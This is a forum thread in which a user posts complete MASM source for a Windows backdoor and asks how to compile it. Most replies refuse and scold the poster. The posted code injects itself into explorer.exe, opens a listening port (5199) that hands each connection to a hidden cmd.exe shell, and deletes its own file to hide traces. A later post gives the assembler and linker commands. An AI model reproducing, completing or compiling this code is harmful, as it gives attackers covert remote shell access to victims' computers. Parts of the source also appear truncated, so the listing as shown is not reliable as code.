Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: ASM backdoor

  1. #1

    ASM backdoor

    Guys Iím NOT very good with ASM / C (have abit different approach)
    How could I compile the following code in to executable PE (.exe) or convert it in to compil-eable C code ?

    When this EXE is ran it will create a thread
    ;inside of explorer.exe that listens on port 5199
    ;for connections. Then the EXE deletes itself
    ;leaving no traces.

    ;Each new connection is redirected to a spawned
    ;cmd.exe process until the next reboot.

    ;linker options: /base:0x13140000 /filealign:0x200 / /section:.text,RWX /subsystem:windows /libpath:\masm32\lib backdoor.obj

    .model flat,stdcall
    option casemap:none
    include \masm32\include\
    include \masm32\include\
    includelib \masm32\lib\kernel32.lib
    include \masm32\include\
    includelib \masm32\lib\user32.lib
    include \masm32\include\
    includelib \masm32\lib\wsock32.lib

    szTarget byte 'Shell_TrayWnd', 0
    szUser32 byte 'user32.dll', 0
    szWinsock byte 'wsock32.dll', 0
    szCommandLine byte 'cmd.exe', 0
    szSharedData byte 261 dup (0)

    hModule dword ?
    hNewModule dword ?
    hProcess dword ?
    dwSize dword ?
    dwPid dword ?
    dwBytesWritten dword ?
    dwTid dword ?
    WSAData WSADATA <>

    ShellClient proc dwSock:dword
    local hiRead:dword
    local hoRead:dword
    local hiWrite:dword
    local hoWrite:dword
    local startupinfo:STARTUPINFO
    local processinfo:PROCESS_INFORMATION
    local exitcode:dword
    local buffer[1024]:byte
    local bytes:dword
    local available:dword
    local data:dword
    mov sat.nLength, sizeof SECURITY_ATTRIBUTES
    mov sat.lpSecurityDescriptor, 0
    mov sat.bInheritHandle, TRUE
    invoke CreatePipe, addr hiRead, addr hiWrite, addr sat, 0
    invoke CreatePipe, addr hoRead, addr hoWrite, addr sat, 0
    invoke GetStartupInfo, addr startupinfo
    mov startupinfo.cb, sizeof STARTUPINFO
    mov eax, hoWrite
    mov startupinfo.hStdOutput, eax
    mov startupinfo.hStdError, eax
    mov eax, hiRead
    mov startupinfo.hStdInput, eax
    mov startupinfo.wShowWindow, SW_HIDE
    invoke CreateProcess, 0, addr szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr startupinfo, addr processinfo
    invoke CloseHandle, hoWrite
    invoke CloseHandle, hiRead
    mov bytes, 1
    invoke ioctlsocket, dwSock, FIONBIO, addr bytes
    .while TRUE
    invoke Sleep, 1
    invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode
    .if exitcode != STILL_ACTIVE
    invoke PeekNamedPipe, hoRead, addr buffer, 1024, addr bytes, addr available, 0
    .if bytes != 0
    .if available > 1024
    .while bytes >= 1024
    invoke Sleep, 1
    invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
    .if bytes != 0
    invoke send, dwSock, addr buffer, bytes, 0
    invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
    .if bytes != 0
    invoke send, dwSock, addr buffer, bytes, 0
    invoke recv, dwSock, addr buffer, 1024, 0
    .if eax == SOCKET_ERROR || eax == 0
    invoke WSAGetLastError
    .if eax == WSAEWOULDBLOCK
    invoke TerminateProcess, processinfo.hProcess, 0
    mov edx, eax
    invoke WriteFile, hiWrite, addr buffer, edx, addr bytes, 0
    invoke CloseHandle, hiWrite
    invoke CloseHandle, hoRead
    invoke closesocket, dwSock
    ShellClient endp

    Shelld proc
    local SockAddrIn:sockaddr_in
    local dwSock:dword
    local dwMode:dword
    invoke DeleteFile, addr szSharedData
    invoke LoadLibrary, addr szUser32
    invoke LoadLibrary, addr szWinsock
    invoke WSAStartup, 101h, addr WSAData
    invoke socket, PF_INET, SOCK_STREAM, 0
    mov dwSock, eax
    mov SockAddrIn.sin_family, AF_INET
    invoke htons, 5199
    mov SockAddrIn.sin_port, ax
    mov SockAddrIn.sin_addr, INADDR_ANY
    invoke bind, dwSock, addr SockAddrIn, sizeof SockAddrIn
    mov dwMode, 1
    invoke ioctlsocket, dwSock, FIONBIO, addr dwMode
    invoke listen, dwSock, SOMAXCONN
    invoke accept, dwSock, addr SockAddrIn, 0
    .if eax != INVALID_SOCKET
    mov edx, eax
    invoke CreateThread, 0, 0, addr ShellClient, edx, 0, 0
    invoke CloseHandle, eax
    invoke Sleep, 1000
    jmp @B
    Shelld endp

    invoke GetModuleHandle, 0
    mov hModule, eax
    mov edi, eax
    assume editr IMAGE_DOS_HEADER
    add edi, [edi].e_lfanew
    add edi, sizeof dword
    add edi, sizeof IMAGE_FILE_HEADER
    assume editr IMAGE_OPTIONAL_HEADER32
    mov eax, [edi].SizeOfImage
    mov dwSize, eax
    assume edi:NOTHING
    invoke GetModuleFileName, 0, addr szSharedData, 261
    invoke FindWindow, addr szTarget, 0
    invoke GetWindowThreadProcessId, eax, addr dwPid
    invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, dwPid
    mov hProcess, eax
    invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE
    invoke VirtualAllocEx, hProcess, hModule, dwSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
    mov hNewModule, eax
    invoke WriteProcessMemory, hProcess, hNewModule, hModule, dwSize, addr dwBytesWritten
    invoke CreateRemoteThread, hProcess, 0, 0, addr Shelld, hModule, 0, addr dwTid
    invoke ExitProcess, 0
    end start
    -----------------end code--------------------

  2. #2
    Just Another Geek
    Join Date
    Jul 2002
    Rotterdam, Netherlands
    The whole point of releasing this kind of "tool" in this form is to prevent n00bs from having yet another scriptkiddie tool.

    Start by learning what assembler is and how, when and where to use it.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  3. #3
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    United Kingdom: Bridlington
    I do not think you will get anyone here to help you write a backdoor, well, not openly at least

    You do not explain your reasons, and even if you did, I wonder if people would really believe you.

    I do hope you read the front page of this forum.............carefully?

    I would point out that those who do not KNOW how to write malware get caught........for certain.

    I agree with SirDice....................learn assembler, and then you will know

    Take care, I think that you might need to?

  4. #4
    Senior Member
    Join Date
    Feb 2002
    *sigh* let me help you write a tool you will a) claim you wrote on your own to gain 31337 5+@+|_|5 with your skiddie buddies B) will be used to hamper my/others security and C) will give you a ego the size of texas. No thanks.
    REread what this site is about. and since you dont know what you are doing, its gonna be a VERY short time before your caught. Get up, go out and enjoy the sun, who knows when you wont be able to do that anymore...
    Remember -
    The ark was built by amatures...
    The Titanic was built by professionals.

  5. #5
    who's talking about lamers here.....I sad that ASM is not my powerful side....
    here's the diffcult way of doing it....


    :ml /c /coff backdor.asm
    link /base:0x13140000 /filealign:0x200 / /section:.text,RWX /subsystem:windows /libpath:\masm32\lib backdoor.obj

    any easy ways of doing it?

  6. #6
    AntiOnline n00b
    Join Date
    Feb 2004
    the reason for calling is not because you can't code in ASM. it's because of what you are tryin to compile buddy. if you don't know already you are asking us to help you compile a skiddie tool. if you would have asked for help in learning Assembly or help compiling some other valid program i think people would helped you. you said you are not that familear with Assembly and to start off you are trying to compile a pre-coded backdoor program. Strange?? i think your intensions are not to learn Assembly but to only get this program to compile ane show off or to try to crack into somebody comp. Hope bubba will be real nice to you. "bubba who??". you'r new room mate.

  7. #7
    Join Date
    Nov 2003
    lmao, you don't learn do you?
    People have just bombed you telling you NOT to post this type of stuff in these forums. Yet you totally ignore all the advice given and continue this thread.
    Read A Guide to AntiOnline and the world of security writen by Ennis

  8. #8
    Senior Member
    Join Date
    Feb 2002
    Like I said in another thread, hope your "knowledge" and "t00lz" help you when you are getting "hacked " by above-mentioned bubba
    Remember -
    The ark was built by amatures...
    The Titanic was built by professionals.

  9. #9
    Senior Member
    Join Date
    Dec 2003
    this situation starts being annoying.....from the one side those who came here to learn hacking for impressing their friends( they are banned after 2 or three posts of this kind after being flamed)....from the other side the 'good guys' are all so never did anything illegal,never used a backdoor,never used trojans or evn scriptkiddie tools,always on the good fact i cannot say anything to senior members because at least they know more than me and i sort of respact them....but what is going on with newbies? I mean there is not a nomal newbie out there? From the one side script kiddies from the other angels???? What a f**k....anyway i dont think the intentions of karavay were bad at least he may try to learn programming not flame other people...anyway cheers and dont be so quick to judge if you cannot help.....(thats particularly for newbies)
    Is that the place where I am supposed to say sth clever and brilliant so that everybody understands how clever nice guy I am????
    Screw you guys I am going home!-Kartman

  10. #10
    thanks tyfon !
    Camon guys what is this all about.....I mean what is this site about........ ask yourself this burning question.......I didnt ask you how TO hack microsoft did I ... the question was how to compile the code....and I'm sure that half of you guys have copied the code .. next time I'll post the code without any comments to it!!!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts